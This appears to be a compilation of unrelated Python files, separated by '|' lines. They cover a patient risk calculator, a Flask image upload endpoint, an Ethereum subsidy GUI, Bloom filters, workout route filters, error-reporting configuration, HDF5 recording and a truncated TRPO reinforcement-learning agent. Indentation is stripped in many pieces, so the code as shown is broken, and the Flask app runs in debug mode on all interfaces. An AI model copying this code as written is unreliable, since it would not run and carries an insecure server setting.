assert (dti.hour == 12).all() # we haven't screwed up yet
res = dti + offset
assert (res.hour == 12).all()
|
idade = int(input("What is the patient's age? "))
peso = float(input("What is the patient's weight? "))
if (idade <= 20) and (90 < peso):
    print('Risk 7')
elif (idade <= 20) and (60 < peso <= 90):
    print('Risk 8')
elif (idade <= 20) and (peso <= 60):
    print('Risk 9')
elif (20 < idade <= 50) and (90 < peso):
    print('Risk 4')
elif (20 < idade <= 50) and (60 < peso <= 90):
    print('Risk 5')
elif (20 < idade <= 50) and (peso <= 60):
    print('Risk 6')
elif (50 < idade) and (90 < peso):
    print('Risk 1')
elif (50 < idade) and (60 < peso <= 90):
    print('Risk 2')
elif (50 < idade) and (peso <= 60):
    print('Risk 3')
|
#!/usr/bin/env python3
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route('/')
def init_recorder():
return render_template('./index2.html')
@app.route('/get_canvas_images', methods=['POST', 'GET'])
def get_canvas_images():
if request.method == 'POST':
        # Save each submitted canvas image under its field name
        for field in ("symptoms", "diagnosis", "treatment", "tests", "others"):
            data = request.files["_" + field].read()
            with open("canvas_images/{}.png".format(field), "wb") as image_file:
                image_file.write(data)
        # Signal that a fresh set of canvases is available
        with open("canvas_images/flag.txt", "w") as flag_file:
            flag_file.write("1")
return "CANVASES SAVED!!!"
if __name__ == '__main__':
app.run(host = "0.0.0.0",debug=True)
|
from .utils import imshow
from .video import Video
from .contour import Contour, find_biggest_contours
__all__ = [
'imshow',
'Video',
'Contour',
'find_biggest_contours',
]
|
#!/usr/bin/python
import wx
import sys
import os
import json
import time
import io
try:
to_unicode = unicode
except NameError:
to_unicode = str
sys.path.insert(0, 'UserInterface')
import models
import ethereumUtils
import injectContract
import generateUser
import executeFunction
class CreateSubvencionsFrame(models.ContractFrame):
def __init__(self, parent, username):
models.ContractFrame.__init__(self, parent)
self.address, self.password = ethereumUtils.get_user_address_pass_entitat_sub(username)
ethereumUtils.unlock_account(self.address, self.password)
##print ("username: " + str(username))
#res = executeFunction.computeOutput(username, '0', "newSubvention", ['2222', '[0]', '[0]', '[22]'], tipus = '2')
##print ("res: " + str(res))
def onCancel( self, event ):
ethereumUtils.kill_geth()
self.Destroy()
def onCreateContract( self, event ):
ethereumUtils.unlock_account(self.address, self.password)
bGender = self.checkBoxGender.GetValue()
bAge = self.checkBoxAge.GetValue()
bPostalCode = self.choicePostalCode.GetValue()
money = self.textMoney.GetValue()
ageLeft = self.textLeft.GetValue()
ageRight = self.textRight.GetValue()
value_postalCode = self.textPostalCode.GetValue()
if not bGender and not bAge and not bPostalCode:
Dialogs.ErrorMessage("Error","No conditions have been chosen")
elif money == "" or money == "0":
Dialogs.ErrorMessage("Error","It has not been specified how much money")
elif (bAge and (ageLeft == "" and ageRight == "")) or (bPostalCode and value_postalCode == ""):
Dialogs.ErrorMessage("Error","The condition has been chosen, but no value has been specified")
else:
l_variables = []
l_operators = []
l_values = []
# variable:
# Age -> 0
# Gender -> 1
# PostalCode -> 2
# operator:
            # person value (op) subsidy value
# == -> 0
# != -> 1
# <= -> 2
# >= -> 3
# < -> 4
# > -> 5
if (bGender):
l_variables.append(1)
l_operators.append(0)
l_values.append(self.choiceGender.GetSelection())
if (bAge):
#choiceLeftChoices = [ "<", "<=", "==", "!=" ]
                # subsidy value (op) person value
# "<" -> 0 -> 5
# "<=" -> 1 -> 3
# "==" -> 2 -> 0
# "!=" -> 3 -> 1
if (ageLeft != ""):
l_variables.append(0)
leftCondition = self.choiceLeft.GetSelection()
if (leftCondition == 0):
l_operators.append(5)
elif (leftCondition == 1):
l_operators.append(3)
elif (leftCondition == 2):
l_operators.append(0)
else:
l_operators.append(1)
l_values.append(int(ageLeft))
#choiceRightChoices = [ "<", "<=", "==", "!=" ]
                # person's value (op) subvention's value
# "<" -> 0 -> 4
# "<=" -> 1 -> 2
# "==" -> 2 -> 0
# "!=" -> 3 -> 1
if (ageRight != ""):
l_variables.append(0)
rightCondition = self.choiceRight.GetSelection()
if (rightCondition == 0):
l_operators.append(4)
elif (rightCondition == 1):
l_operators.append(2)
elif (rightCondition == 2):
l_operators.append(0)
else:
l_operators.append(1)
l_values.append(int(ageRight))
if (bPostalCode):
l_variables.append(2)
l_operators.append(0)
l_values.append(str(value_postalCode))
mDades = [str(money), \
str(l_variables), \
str(l_operators), \
str(l_values) ]
inParams = ""
if len(mDades) > 0:
for parameter in mDades:
inParams += parameter+', '
# uint amount, uint8[] variable, uint8[] operator, uint[] value
# '2222' '[0]' '[0]' '[22]'
#res = executeFunction.computeOutput("subvencio1", 0, "newSubvention", mDades)
##print ("computeOutput(\"newSubvention\"): " + str(res))
#print ("mDades: " + str(mDades))
##print ("inParams: " + str(inParams))
ethereumUtils.unlock_account(self.address, self.password)
res = ethereumUtils.execute_function_on_Manager(self.address, "newSubvention", inParams, gas="'4712388'")
#res2 = ethereumUtils.execute_function_on_Person(str(self.address), str(self.ca_address), "confirm", "8,"+res, gas="'4712388'")
#ethereumUtils.unlock_account(self.address, self.password)
#res = ethereumUtils.execute_function_on_Manager("0xa0350e18ffa0e79b37e887f99c0ebfc7e1beb0c3", "newSubvention", inParams)
#print ("computeOutput(\"newSubvention\"): " + str(res))
Dialogs.CorrectMessage("Success","Subvencion has been created successfully")
ethereumUtils.kill_geth()
self.Destroy()
class Dialogs():
@staticmethod
def ErrorMessage(title, message):
Dialogs.Message(title, message, wx.ICON_ERROR)
@staticmethod
def CorrectMessage(title, message):
Dialogs.Message(title, message, wx.OK)
@staticmethod
def InfoMessage(title, message):
Dialogs.Message(title, message, wx.ICON_INFORMATION)
@staticmethod
def Message(title, message, style):
dlg = wx.MessageDialog(parent=None, message=message, caption=title, style=style)
dlg.ShowModal()
dlg.Destroy()
def run(username):
app = wx.App(False)
frame = CreateSubvencionsFrame(None,username)
frame.Show(True)
app.MainLoop()
if __name__ == '__main__':
run("subvencio1")
|
from bloomfilter import BloomFilter
class ScalingBloomFilter:
def __init__(self, capacity, error=0.005, max_fill=0.8, error_tightening_ratio=0.5):
self.capacity = capacity
self.base_error = error
self.max_fill = max_fill
self.items_until_scale = int(capacity * max_fill)
self.error_tightening_ratio = error_tightening_ratio
self.bloom_filters = []
self.current_bloom = None
self._add_bloom()
def _add_bloom(self):
new_error = self.base_error * self.error_tightening_ratio ** len(
self.bloom_filters
)
new_bloom = BloomFilter(self.capacity, new_error)
self.bloom_filters.append(new_bloom)
self.current_bloom = new_bloom
return new_bloom
def add(self, key):
if key in self:
return True
self.current_bloom.add(key)
self.items_until_scale -= 1
if self.items_until_scale == 0:
bloom_size = len(self.current_bloom)
bloom_max_capacity = int(self.current_bloom.capacity * self.max_fill)
# We may have been adding many duplicate values into the Bloom, so
# we need to check if we actually need to scale or if we still have
# space
if bloom_size >= bloom_max_capacity:
self._add_bloom()
self.items_until_scale = bloom_max_capacity
else:
self.items_until_scale = int(bloom_max_capacity - bloom_size)
return False
def __contains__(self, key):
return any(key in bloom for bloom in self.bloom_filters)
def __len__(self):
return int(sum(len(bloom) for bloom in self.bloom_filters))
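# Minimal usage sketch (not part of the original module). It relies only on the
# BloomFilter API already used above (constructor taking capacity and error,
# `add`, `__contains__`, `__len__`); the capacity below is an arbitrary example.
if __name__ == "__main__":
    sbf = ScalingBloomFilter(capacity=1000, error=0.005)
    for i in range(5000):
        sbf.add("key-{}".format(i))
    # Bloom filters never produce false negatives, so added keys are always found.
    assert "key-0" in sbf
    print("underlying blooms:", len(sbf.bloom_filters), "approx. items:", len(sbf))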
|
"""Constants for the sentry integration."""
DOMAIN = "sentry"
CONF_DSN = "dsn"
CONF_ENVIRONMENT = "environment"
|
""" Arrary Binary Seach Mod """
def binary_search(arr, value):
""" Binary Search takes array and value to search """
""" returns index or-1"""
count = len(arr)
midpoint = count // 2
start_index = 0
end_index = count - 1
while value != arr[start_index+midpoint] and count > 1:
# import pdb; pdb.set_trace()
if value > arr[midpoint+start_index]:
            start_index = start_index + midpoint
count = count - (midpoint)
midpoint = count // 2
else:
end_index = end_index - midpoint
count = count - midpoint
midpoint = count // 2
if value == arr[midpoint+start_index]:
return midpoint + start_index
else:
return -1
# print(binary_search([1, 2, 3, 4, 5, 6], 9))
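# Small usage sketch (added for illustration); the array must already be sorted.
if __name__ == "__main__":
    data = [1, 2, 3, 4, 5, 6]
    print(binary_search(data, 4))   # -> 3
    print(binary_search(data, 6))   # -> 5
    print(binary_search(data, 9))   # -> -1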
|
import ik.monkey_patching
default_app_config = 'ik.apps.IKAppConfig'
|
from typing import List, Tuple, Dict
from watchlib.utils import WorkoutRoute
from abc import ABC
import numpy as np
import json
from datetime import datetime as dt
class BBox:
min_lon: float
min_lat: float
max_lon: float
max_lat: float
def __init__(self, min_lon, min_lat, max_lon, max_lat):
self.min_lon = min_lon
self.min_lat = min_lat
self.max_lon = max_lon
self.max_lat = max_lat
def get_values(self):
return self.min_lon, self.min_lat, self.max_lon, self.max_lat
class Filter(ABC):
def __init__(self):
pass
    def filter(self) -> List:
pass
# Abstract filter class to filter with bounding boxes
class BBoxFilter(Filter):
def set_routes(self, routes: List[WorkoutRoute]):
self.routes = routes
def route_bboxes(self, routes: List[WorkoutRoute]) -> List[BBox]:
bboxes = []
        for route in routes:
lat_min, lat_max = route["lat"].min(), route["lat"].max()
lon_min, lon_max = route["lon"].min(), route["lon"].max()
bboxes.append(BBox(lon_min, lat_min, lon_max, lat_max))
return bboxes
class DiagonalBBoxFilter(BBoxFilter):
def __init__(self, diagonal_distance: float):
self.diagonal_distance = diagonal_distance
def __haversine(lat1: float, lat2: float, lon1: float, lon2: float) -> float:
"""
Calculates distance between two points on earth in km
"""
lat1, lat2, lon1, lon2 = np.deg2rad((lat1, lat2, lon1, lon2))
latd = lat2 - lat1
lond = lon2 - lon1
R = 6372.8 # Earth radius in km
d = 2*R*np.arcsin(np.sqrt(np.sin(latd/2)**2 +
np.cos(lat1)*np.cos(lat2)*np.sin(lond/2)**2))
return d
def __haversine_for_route(route: WorkoutRoute) -> float:
lat1, lat2 = route["lat"].min(), route["lat"].max()
lon1, lon2 = route["lon"].min(), route["lon"].max()
return DiagonalBBoxFilter.__haversine(lat1, lat2, lon1, lon2)
@staticmethod
def max_bbox(routes: List[WorkoutRoute]) -> float:
distances = [DiagonalBBoxFilter.__haversine_for_route(
route) for route in routes]
return max(distances)
@staticmethod
def min_bbox(routes: List[WorkoutRoute]) -> float:
distances = [DiagonalBBoxFilter.__haversine_for_route(
route) for route in routes]
return min(distances)
def simple_dist(self, lat1: float, lat2: float, lon1: float, lon2: float) -> Tuple[float, float]:
"""
Calculates distances between two lon and lat values
"""
degree_to_meter = 111139
lond = np.abs(lon1 - lon2)*degree_to_meter
latd = np.abs(lat1 - lat2)*degree_to_meter
return lond, latd
def filter(self, routes: List[WorkoutRoute]) -> List[WorkoutRoute]:
"""
This function uses the diagonal distance between the
boundary box corners to filter out smaller routes based
on a tolerance in km.
"""
print(
f"[Filter]\t\tFiltering out routes with a shorter diagonal than {self.diagonal_distance}km.")
filtered_routes = []
for route in routes:
h = DiagonalBBoxFilter.__haversine_for_route(route)
if h >= self.diagonal_distance:
filtered_routes.append(route)
return filtered_routes
class CountryFilter(BBoxFilter):
countries: Dict[str, BBox] = {
"All": BBox(0, 0, 100, 100),
"Italy": BBox(6.75, 36.62, 18.48, 47.12),
"Germany": BBox(5.98865807458, 47.3024876979, 15.0169958839, 54.983104153),
"Austria": BBox(9.48, 46.43, 16.98, 49.04)
}
def __init__(self, country_bbox: BBox):
self.country_bbox = country_bbox
# self.load_country_bboxes()
def load_country_bboxes(self, path: str):
with open(path, "r") as f:
countries_json = json.load(f)
for country in countries_json:
min_lat = countries_json[country]["sw"]["lat"]
min_lon = countries_json[country]["sw"]["lon"]
max_lat = countries_json[country]["ne"]["lat"]
max_lon = countries_json[country]["ne"]["lon"]
self.countries[country] = BBox(
min_lon, min_lat, max_lon, max_lat)
def check_country_bbox(self, country: str, bbox: BBox) -> bool:
country_bbox = self.countries[country]
min_lon, min_lat, max_lon, max_lat = country_bbox.get_values()
min_lon_r, min_lat_r, max_lon_r, max_lat_r = bbox.get_values()
return (min_lon_r > min_lon) and (min_lat_r > min_lat) and (max_lon_r < max_lon) and (max_lat_r < max_lat)
def route_countries(self, routes: List[WorkoutRoute]) -> List[str]:
countries = []
bboxes = self.route_bboxes(routes)
for bbox in bboxes:
for country in self.countries:
if self.check_country_bbox(country, bbox):
countries.append(country)
return countries
def filter(self, routes: List[WorkoutRoute]) -> List[WorkoutRoute]:
"""
routes: routes that should be filtered
"""
print(f"[Filter]\t\tFiltering only routes from {self.country_bbox}.")
min_lon, min_lat, max_lon, max_lat = self.country_bbox.get_values()
filtered_routes = []
for route in routes:
if (route["lon"].min() >= min_lon) and (route["lon"].max() <= max_lon):
if (route["lat"].min() >= min_lat) and (route["lat"].max() <= max_lat):
filtered_routes.append(route)
return filtered_routes
class TimeFilter(Filter):
def __init__(self, _from: dt = None, _to: dt = None, min_duration_sec=0, max_duration_sec=0):
if _from is None:
self._from = dt.fromtimestamp(0)
else:
self._from = _from
if _to is None:
self._to = dt.now()
else:
self._to = _to
self.min_duration_sec = min_duration_sec
self.max_duration_sec = max_duration_sec
def filter(self, routes: List[WorkoutRoute]) -> List[WorkoutRoute]:
print(
f"[Filter]\t\tFiltering out routes from {self._from.date()} to {self._to.date()} which are {self.min_duration_sec} to {self.max_duration_sec} seconds long.")
filtered_routes = []
for route in routes:
if route.start and route.end and route.duration_sec:
if route.start > self._from and route.end < self._to and route.duration_sec <= self.max_duration_sec and route.duration_sec >= self.min_duration_sec:
filtered_routes.append(route)
return filtered_routes
@staticmethod
def min_time(routes: List[WorkoutRoute]) -> dt:
return min([route.start.timestamp() for route in routes])
@staticmethod
def max_time(routes: List[WorkoutRoute]) -> dt:
return max([route.end.timestamp() for route in routes])
class FilterPipeline:
def __init__(self, filter_names: List[str], filters: List[Filter]):
self.filter_names = filter_names
self.filters = filters
def filter(self, data):
filtered_data = data
for filter in self.filters:
filtered_data = filter.filter(filtered_data)
return filtered_data
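# Illustrative usage sketch (not part of the original module): `routes` is
# assumed to be a list of WorkoutRoute objects obtained elsewhere; only the
# filter classes defined above are used.
def _example_pipeline(routes: List[WorkoutRoute]) -> List[WorkoutRoute]:
    pipeline = FilterPipeline(
        filter_names=["diagonal", "country", "time"],
        filters=[
            DiagonalBBoxFilter(diagonal_distance=1.0),  # keep routes whose bbox diagonal is >= 1 km
            CountryFilter(CountryFilter.countries["Germany"]),  # keep routes inside Germany's bbox
            TimeFilter(min_duration_sec=600, max_duration_sec=7200),  # 10 min to 2 h
        ],
    )
    return pipeline.filter(routes)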
|
import os
import socket
from six.moves import zip
from six import iteritems
class Configuration(object):
OPTIONS = (
('api_key', str),
('project_root', str),
('environment', str),
('hostname', str),
('endpoint', str),
('params_filters', list),
('trace_threshold', int)
)
def __init__(self, *args, **kwargs):
self.api_key = ''
self.project_root = os.getcwd()
self.environment = 'production'
self.hostname = socket.gethostname()
self.endpoint = 'https://api.honeybadger.io'
self.params_filters = ['password', 'password_confirmation', 'credit_card']
self.trace_threshold = 2000
self.set_12factor_config()
self.set_config_from_dict(kwargs)
def set_12factor_config(self):
for option in list(zip(*self.OPTIONS))[0]:
val = os.environ.get('HONEYBADGER_{}'.format(option.upper()), getattr(self, option))
option_types = dict(self.OPTIONS)
try:
if option_types[option] is list:
val = val.split(',')
elif option_types[option] is int:
val = int(val)
except:
pass
setattr(self, option, val)
def set_config_from_dict(self, config):
for (key, value) in iteritems(config):
if key in list(zip(*self.OPTIONS))[0]:
setattr(self, key, value)
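# Illustrative example: values can come from HONEYBADGER_* environment
# variables or from keyword arguments, with keyword arguments applied last.
#   os.environ['HONEYBADGER_PARAMS_FILTERS'] = 'password,api_token'
#   config = Configuration(environment='staging')
#   config.params_filters  -> ['password', 'api_token']
#   config.environment     -> 'staging'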
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import h5py
from ..utility.utils import path
class ArrayRecording(object):
"""
Class for serializing numpy ndarrays.
    Each set of numpy arrays is stored under a unique key in the recording dictionary.
Attributes are added in the attributes dictionary and are meant for recording parameters used to generate the numpy arrays.
Constructor params -----
@param filename : Name of the file to write to (without suffix). If no file with this name exists a new one is created when saving.
@param path : Relative path to data files i.e. /data/testdata/ (the absolute path is added automagically)
@return : Recording object which can either record and save numpy arrays or load numpy arrays from existing datafiles.
NOTE: loading clears every dictionary, filename and path
"""
default = 'recording'
def __init__(self, filename=None, path=None):
self.__recording = {}
self.__attributes = {}
self.__filename = filename
self.__path = path
@property
def attributes(self):
return self.__attributes
@property
def recording(self):
return self.__recording
@property
def path(self):
return self.__path
@property
def filename(self):
return self.__filename
def clear(self):
self.__recording = {}
self.__attributes = {}
self.__filename = None
self.__path = None
def add_attribute(self, name, value):
self.__attributes[name] = value
def add_attributes(self, attribute_dict):
for key in attribute_dict:
self.__attributes[key] = attribute_dict[key]
def add_record(self, item, record_name):
if record_name not in self.recording:
self.__recording[record_name] = np.array(item)
else:
self.__recording[record_name] = np.vstack(
[self.recording[record_name], item])
def set_relative_path(self, path):
self.__path = path
def set_filename(self, filename):
self.__filename = ''.join([path(), self.path, filename, '.h5'])
def save(self, filename=None):
if filename is None:
if self.filename is None:
raise ValueError("Set filename first")
filename = self.filename
with h5py.File(filename, 'w') as h5:
for key in self.recording:
h5.create_dataset(key, data=self.recording[key])
for key in self.attributes:
h5.attrs.create(key, self.attributes[key])
def load(self, dataset_names=None, filename=None):
if filename is None:
if self.filename is None:
raise ValueError("Set filename first")
filename = self.filename
self.clear()
with h5py.File(filename, 'r') as h5:
if dataset_names is None:
# If no specific dataset name is given load all.
dataset_names = []
for key in h5.keys():
dataset_names.append(key)
try:
for name in dataset_names:
self.__recording[name] = h5[name][:]
for key in h5.attrs.keys():
self.__attributes[key] = h5.attrs.get(key)
except (EOFError, StopIteration) as e:
                raise
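# Minimal usage sketch (illustrative, not part of the original class). An
# explicit filename is passed to save()/load(), so set_relative_path() and
# set_filename() are not needed here; the filename is an arbitrary example.
def _example_usage(tmp_file='example_recording.h5'):
    rec = ArrayRecording()
    rec.add_attribute('dt', 0.01)
    for _ in range(3):
        rec.add_record(np.random.rand(4), 'voltages')  # rows are stacked per call
    rec.save(filename=tmp_file)
    loaded = ArrayRecording()
    loaded.load(filename=tmp_file)
    return loaded.recording['voltages'].shape, loaded.attributes['dt']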
|
pma = 0
pme = 0
for c in range(1, 6):
    peso = float(input('Enter the weight of person #{} in Kg: '.format(c)))
if c == 1:
pma = peso
pme = peso
else:
if peso>pma:
pma = peso
if peso<pme:
pme = peso
print('The heaviest weight so far was {}Kg'.format(pma))
print('The lightest weight so far was {}Kg'.format(pme))
|
# Copyright 2022, Battelle Energy Alliance, LLC
# ALL RIGHTS RESERVED
"""
Test the capability of loading economic information from HYBRID.
Tests the Python script (HERON/src/Hybrid2Heron/hybrid2heron_economic.py) that autoloads the required economic information about a specific component or an element of the grid system from HYBRID text files into a HERON input XML file.
"""
import os
import sys
# Execute the python script located at src/Hybrid2Heron
HYBRID_autoloader_path = os.path.dirname(os.path.abspath(__file__)).split("HERON")[0] + "HERON/src/Hybrid2Heron/hybrid2heron_economic.py"
exec(open(HYBRID_autoloader_path).read())
|
from datetime import datetime, timedelta
from sqlalchemy import Column, DateTime, ForeignKey, Integer, String
from sqlalchemy.orm import relationship
from app.models import orm
from app.models.orm import Base
from app.util.passwords import generate_access_token
def create_expiration_date():
return datetime.now() + timedelta(days=7)
def default_token_type():
return "bearer"
class Token(Base):
id = Column(Integer, primary_key=True)
access_token = Column(String, default=generate_access_token, nullable=False)
refresh_token = Column(String, default=generate_access_token, nullable=False)
token_type = Column(String, default=default_token_type)
actor_id = Column(Integer, ForeignKey("actor.id"))
actor = relationship("RegisteredActor", back_populates="token")
expiration_date = Column(DateTime, default=create_expiration_date)
# user_agent = Column(String)
def __init__(self, actor: orm.RegisteredActor):
self.actor = actor
def update(self):
self.access_token = generate_access_token()
self.refresh_token = generate_access_token()
self.expiration_date = create_expiration_date()
|
import re
import os
from pathlib import Path
from distutils.dir_util import copy_tree
SRC_DIR = '/Users/petergish/Nucleus/PersonalTime/PyQt/Fantasy_Creator'
DEST_DIR = '/Volumes/Skylab/Fantasy_Creator_source'
MODULE_PREFIX = 'fantasycreator'
EXCLUDED_DIRS = ('.vscode', '.git', 'fantasycreator/resources', '__pycache__')
EXCLUDED_FILES = ('moduleConverter.py', 'config.py', 'resources.py', 'run.py',
'setup.py')
MODULE_FILES = []
# Copy entire dev tree
try:
copy_tree(SRC_DIR, DEST_DIR)
except:
print('Could not access external drive. Aborting...')
exit()
for path in Path(DEST_DIR).rglob('*.py'):
if path.name not in EXCLUDED_FILES and not path.name.startswith('__'):
MODULE_FILES.append(path)
for current_file in MODULE_FILES:
with open(current_file, 'r') as read_file:
contents = read_file.readlines()
found_imports = False
line_count = 0
for line in contents:
if not line.startswith(('class', 'def', '# BREAK')):
if found_imports and line != '\n':
# print([ord(c) for c in line])
if line.startswith('from'): # importing user module
line = f'from {MODULE_PREFIX}.' + line[len('from '):]
elif line.startswith('import'): # import resources
line = f'from {MODULE_PREFIX} ' + line
contents[line_count] = line
elif re.sub(r'\s', '', line.rstrip()).casefold() in ('#user-definedmodules',
'#externalresources'):
found_imports = True
line_count += 1
else:
break
if current_file.name == 'mainWindow.py':
cutoff = 0
for line in reversed(contents):
cutoff += 1
if re.sub(r'\s', '', line.strip()).casefold() == '#non-bundledexecution':
break
contents = contents[:-(cutoff+1)]
with open(f'{current_file}', 'w') as write_file:
write_file.writelines(contents)
|
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import collections
import itertools
from logging import getLogger
import chainer
import chainer.functions as F
import numpy as np
import chainerrl
from chainerrl import agent
from chainerrl.misc.batch_states import batch_states
def _get_ordered_params(link):
"""Get a list of parameters sorted by parameter names."""
name_param_pairs = list(link.namedparams())
ordered_name_param_pairs = sorted(name_param_pairs, key=lambda x: x[0])
return [x[1] for x in ordered_name_param_pairs]
def _flatten_and_concat_variables(vs):
"""Flatten and concat variables to make a single flat vector variable."""
return F.concat([F.flatten(v) for v in vs], axis=0)
def _as_ndarray(x):
"""chainer.Variable or ndarray -> ndarray."""
if isinstance(x, chainer.Variable):
return x.array
else:
return x
def _flatten_and_concat_ndarrays(vs):
"""Flatten and concat variables to make a single flat vector ndarray."""
xp = chainer.cuda.get_array_module(vs[0])
return xp.concatenate([_as_ndarray(v).ravel() for v in vs], axis=0)
def _split_and_reshape_to_ndarrays(flat_v, sizes, shapes):
"""Split and reshape a single flat vector to make a list of ndarrays."""
xp = chainer.cuda.get_array_module(flat_v)
sections = np.cumsum(sizes)
vs = xp.split(flat_v, sections)
return [v.reshape(shape) for v, shape in zip(vs, shapes)]
def _replace_params_data(params, new_params_data):
"""Replace data of params with new data."""
for param, new_param_data in zip(params, new_params_data):
assert param.shape == new_param_data.shape
param.array[:] = new_param_data
def _hessian_vector_product(flat_grads, params, vec):
"""Compute hessian vector product efficiently by backprop."""
grads = chainer.grad([F.sum(flat_grads * vec)], params)
assert all(grad is not None for grad in grads),\
"The Hessian-vector product contains None."
grads_data = [grad.array for grad in grads]
return _flatten_and_concat_ndarrays(grads_data)
def _mean_or_nan(xs):
"""Return its mean a non-empty sequence, numpy.nan for a empty one."""
return np.mean(xs) if xs else np.nan
def _find_old_style_function(outputs):
"""Find old-style functions in the computational graph."""
found = []
for v in outputs:
assert isinstance(v, (chainer.Variable, chainer.variable.VariableNode))
if v.creator is None:
continue
if isinstance(v.creator, chainer.Function):
found.append(v.creator)
else:
assert isinstance(v.creator, chainer.FunctionNode)
found.extend(_find_old_style_function(v.creator.inputs))
return found
class TRPO(agent.AttributeSavingMixin, agent.Agent):
"""Trust Region Policy Optimization.
A given stochastic policy is optimized by the TRPO algorithm. A given
value function is also trained to predict by the TD(lambda) algorithm and
used for Generalized Advantage Estimation (GAE).
Since the policy is optimized via the conjugate gradient method and line
search while the value function is optimized via SGD, these two models
should be separate.
Since TRPO requires second-order derivatives to compute Hessian-vector
products, Chainer v3.0.0 or newer is required. In addition, your policy
must contain only functions that support second-order derivatives.
See https://arxiv.org/abs/1502.05477 for TRPO.
See https://arxiv.org/abs/1506.02438 for GAE.
Args:
policy (Policy): Stochastic policy. Its forward computation must
contain only functions that support second-order derivatives.
Recurrent models are not supported.
vf (ValueFunction): Value function. Recurrent models are not supported.
vf_optimizer (chainer.Optimizer): Optimizer for the value function.
obs_normalizer (chainerrl.links.EmpiricalNormalization or None):
If set to chainerrl.links.EmpiricalNormalization, it is used to
normalize observations based on the empirical mean and standard
deviation of observations. These statistics are updated after
computing advantages and target values and before updating the
policy and the value function.
gamma (float): Discount factor [0, 1]
lambd (float): Lambda-return factor [0, 1]
phi (callable): Feature extractor function
        entropy_coef (float): Weight coefficient for entropy bonus [0, inf)
update_interval (int): Interval steps of TRPO iterations. Every after
this amount of steps, this agent updates the policy and the value
function using data from these steps.
vf_epochs (int): Number of epochs for which the value function is
trained on each TRPO iteration.
vf_batch_size (int): Batch size of SGD for the value function.
standardize_advantages (bool): Use standardized advantages on updates
line_search_max_backtrack (int): Maximum number of backtracking in line
search to tune step sizes of policy updates.
conjugate_gradient_max_iter (int): Maximum number of iterations in
the conjugate gradient method.
conjugate_gradient_damping (float): Damping factor used in the
conjugate gradient method.
act_deterministically (bool): If set to True, choose most probable
actions in the act method instead of sampling from distributions.
value_stats_window (int): Window size used to compute statistics
of value predictions.
entropy_stats_window (int): Window size used to compute statistics
of entropy of action distributions.
kl_stats_window (int): Window size used to compute statistics
of KL divergence between old and new policies.
policy_step_size_stats_window (int): Window size used to compute
statistics of step sizes of policy updates.
Statistics:
average_value: Average of value predictions on non-terminal states.
It's updated before the value function is updated.
average_entropy: Average of entropy of action distributions on
non-terminal states. It's updated on act_and_train.
average_kl: Average of KL divergence between old and new policies.
It's updated after the policy is updated.
average_policy_step_size: Average of step sizes of policy updates
It's updated after the policy is updated.
"""
saved_attributes = ['policy', 'vf', 'vf_optimizer', 'obs_normalizer']
def __init__(self,
policy,
vf,
vf_optimizer,
obs_normalizer=None,
gamma=0.99,
lambd=0.95,
phi=lambda x: x,
entropy_coef=0.01,
update_interval=2048,
max_kl=0.01,
vf_epochs=3,
vf_batch_size=64,
standardize_advantages=True,
line_search_max_backtrack=10,
conjugate_gradient_max_iter=10,
conjugate_gradient_damping=1e-2,
act_deterministically=False,
value_stats_window=1000,
entropy_stats_window=1000,
kl_stats_window=100,
policy_step_size_stats_window=100,
logger=getLogger(__name__),
):
self.policy = policy
self.vf = vf
self.vf_optimizer = vf_optimizer
self.obs_normalizer = obs_normalizer
self.gamma = gamma
self.lambd = lambd
self.phi = phi
self.entropy_coef = entropy_coef
self.update_interval = update_interval
self.max_kl = max_kl
self.vf_epochs = vf_epochs
self.vf_batch_size = vf_batch_size
self.standardize_advantages = standardize_advantages
self.line_search_max_backtrack = line_search_max_backtrack
self.conjugate_gradient_max_iter = conjugate_gradient_max_iter
self.conjugate_gradient_damping = conjugate_gradient_damping
self.act_deterministically = act_deterministically
self.logger = logger
self.value_record = collections.deque(maxlen=value_stats_window)
self.entropy_record = collections.deque(maxlen=entropy_stats_window)
self.kl_record = collections.deque(maxlen=kl_stats_window)
self.policy_step_size_record = collections.deque(
maxlen=policy_step_size_stats_window)
assert self.policy.xp is self.vf.xp,\
'policy and vf should be in the same device.'
if self.obs_normalizer is not None:
assert self.policy.xp is self.obs_normalizer.xp,\
'policy and obs_normalizer should be in the same device.'
self.xp = self.policy.xp
self.last_state = None
self.last_action = None
# Contains episodes used for next update iteration
self.memory = []
# Contains transitions of the last episode not moved to self.memory yet
self.last_episode = []
def _update_if_dataset_is_ready(self):
dataset_size = (
sum(len(episode) for episode in self.memory)
+ len(self.last_episode))
if dataset_size >= self.update_interval:
self._flush_last_episode()
dataset = self._make_dataset()
self._update(dataset)
self.memory = []
def _make_dataset(self):
dataset = list(itertools.chain.from_iterable(self.memory))
xp = self.vf.xp
# Compute v_pred and next_v_pred
states = batch_states([b['state'] for b in dataset], xp, self.phi)
next_states = batch_states([b['next_state']
for b in dataset], xp, self.phi)
if self.obs_normalizer:
states = self.obs_normalizer(states, update=False)
next_states = self.obs_normalizer(next_states, update=False)
with chainer.using_config('train', False), chainer.no_backprop_mode():
vs_pred = chainer.cuda.to_cpu(self.vf(states).array.ravel())
next_vs_pred = chainer.cuda.to_cpu(
self.vf(next_states).array.ravel())
for transition, v_pred, next_v_pred in zip(dataset,
vs_pred,
next_vs_pred):
transition['v_pred'] = v_pred
transition['next_v_pred'] = next_v_pred
# Update stats
self.value_record.extend(vs_pred)
# Compute adv and v_teacher
for episode in self.memory:
adv = 0.0
for transition in reversed(episode):
td_err = (
transition['reward']
+ (self.gamma * transition['nonterminal']
* transition['next_v_pred'])
- transition['v_pred']
)
adv = td_err + self.gamma * self.lambd * adv
transition['adv'] = adv
transition['v_teacher'] = adv + transition['v_pred']
return dataset
def _flush_last_episode(self):
if self.last_episode:
self.memory.append(self.last_episode)
self.last_episode = []
def _update(self, dataset):
"""Update both the policy and the value function."""
if self.obs_normalizer:
self._update_obs_normalizer(dataset)
self._update_policy(dataset)
self._update_vf(dataset)
def _update_obs_normalizer(self, dataset):
assert self.obs_normalizer
states = batch_states(
[b['state'] for b in dataset], self.obs_normalizer.xp, self.phi)
self.obs_normalizer.experience(states)
def _update_vf(self, dataset):
"""Update the value function using a given dataset.
The value function is updated via SGD to minimize TD(lambda) errors.
"""
xp = self.vf.xp
assert 'state' in dataset[0]
assert 'v_teacher' in dataset[0]
dataset_iter = chainer.iterators.SerialIterator(
dataset, self.vf_batch_size)
